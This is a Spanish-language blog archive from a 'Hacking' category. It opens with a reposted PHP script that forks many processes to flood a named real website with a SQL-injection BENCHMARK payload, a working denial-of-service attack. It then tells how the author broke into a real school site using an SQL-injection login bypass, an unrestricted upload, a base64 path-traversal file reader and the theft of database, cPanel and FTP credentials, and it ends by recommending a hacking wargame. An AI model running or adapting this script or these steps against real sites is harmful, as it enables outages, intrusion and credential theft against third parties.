Archive

Archive for the ‘Hacking’ Category

PHP DOS Via SQLI With Fork

Este es un codigo PHP que encontré por ahí, es un DOS via SQL injection

<?php
#Coded By Oz
#DOS Via SQLI With Fork
$url = "http://www.docmedical.com/productos.php?t=4+and+(select+case+true+when+true+then+(BENCHMARK(999999999999,((select+BENCHMARK(999999999999,md5(9999999))))))+end)";
$pids = array();

if ($argc !=2){
echo "Falta Parametro de Conexiones \n";
echo "php script.php 100\n";
}else{

	for($x=0;$x<=$argv[1];$x++)
	{
	  $pid = pcntl_fork();
	   if($pid == -1) {
	       die('could not fork');
	  } else if ($pid) {
	    $pids[] = $pid;
	  } else {
	   echo ".";
	    file_get_contents($url);
	    exit();
	  }
	}
	foreach($pids as $pid) {
	  pcntl_waitpid($pid, $status);

	}
}
?>

Fuentehttp://paste2.org/p/346964
Saludos!

Seguridad en Páginas web

Ayer navegando en chilecomparte, vi a un usuario que en su firma tenía

Ingeniería Civil Informática UVM.
http://www.tecno-byte.com ingeniería de Software.

Y me llamo la atencion su web y la entre a mirar para ver sus trabajos, me di cuenta que tenia un login para Acceso Intranet, como todo informatico curioso puse en el user name el famoso

' OR 1=1 /*

Para intentar inyectar SQL , pero solo salio un error diciendo

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or 1=1 /*' at line 1

Asi que empece a ver Sus Trabajos para ver que podia sacar… El ultimo de sus trabajos era Liceo Comercial de Quilpué: 2008 asi que fui a revisar que tal era. La sorpresa fue que tenia el mismo acceso a intranet =O, probe el

' OR 1=1 /*

pero este no tiraba error, asi que empece a navegar por el menu y me llamo la atencion un boton llamado Recursos lo aprete y salio esta ventana

Al clickear en un link, descargaba un archivo de la carpeta files, como todo cristiano curioso entre a la carpeta files para ver que salia

http://www.licomquilpue.cl/files/

y la sorpresa fue que no tenía un index xD asi que pude ver todos los archivos de esa carpeta

Revise todos los arhivos y sistema.php tenia un formulario para subir archivos =O

Subi un archivo de texto archivo.txt con un hola mundo para probar y exitosamente se subio =O

Luego de eso subi un archivo.php para testear si podia subirlo con un

Y lo subio exitosamente =O mostrando el Hola asi que quise descargar el index.php para ver si podia sacar algunos datos, por lo que cree un archivo system.php que tenía lo siguiente

que recibe un parametro codificado en base64, que es una ruta de algun archivo y que lee dicho archivo, si quiero descargar el index.php tendria que pasarle como parametro ../index.php pero codificado en base64 osea tendria que pasar
http://www.licomquilpue.cl/files/system.php?c=Li4vaW5kZXgucGhw
para descargar el index.php

y urgando con ese archivo pude sacar el user y pass de las bases de datos, del cpanel y de ftp =O

Ya he enviado un email a tecno-byte.com para que arreglen ese bug para que no sea hackeada la página…

Saludos!.

Yashira.org Wargame

Ayer aburrido me puse a buscar alguna página para jugar, no encontre ninguna asi que busque sobre seguridad informatica y encontre esta pagina que me parecio entretenida, se llama Yashira

es un Wargame de Hacking, donde hay retos de :

  • Lenguajes Diseño Web Retos sobre HTML,JS,java,php,etc.
  • Seguridad Sobre los retos de Hacking
  • Ing Inversa Retos sobre ingenieria inversa
  • Cracking Retos sobre Cracking a archivos
  • Criptografia Retos sobre diversos algoritmos
  • Lenguajes de Programación Retos sobre distintos lenguajes de programación
  • Sistemas Operativos Retos sobre SO como Win y/o Linux
  • Misiones Imposibles Retos temporales y /o completamente reales.
  • Esteganografía Todo sobre la ocultación de mensajes.
  • Ingenio quieres saber si eres inteligente o simplemente un cabeza de pollo?
  • Ciencias Crees que lo sabes todo? pues aquí demuestra todo lo que aprendiste en el colegio y/o universidad
  • Mix Retos que no encajan en las otras categorías

Muchos retos donde se aprendee demaciado, solo tienen que Registrarse y empezar a realizar los retos.

Mi Perfil en yashira: http://www.yashira.org/index.php?showuser=19181

Saludos!.

Url: http://www.yashira.org/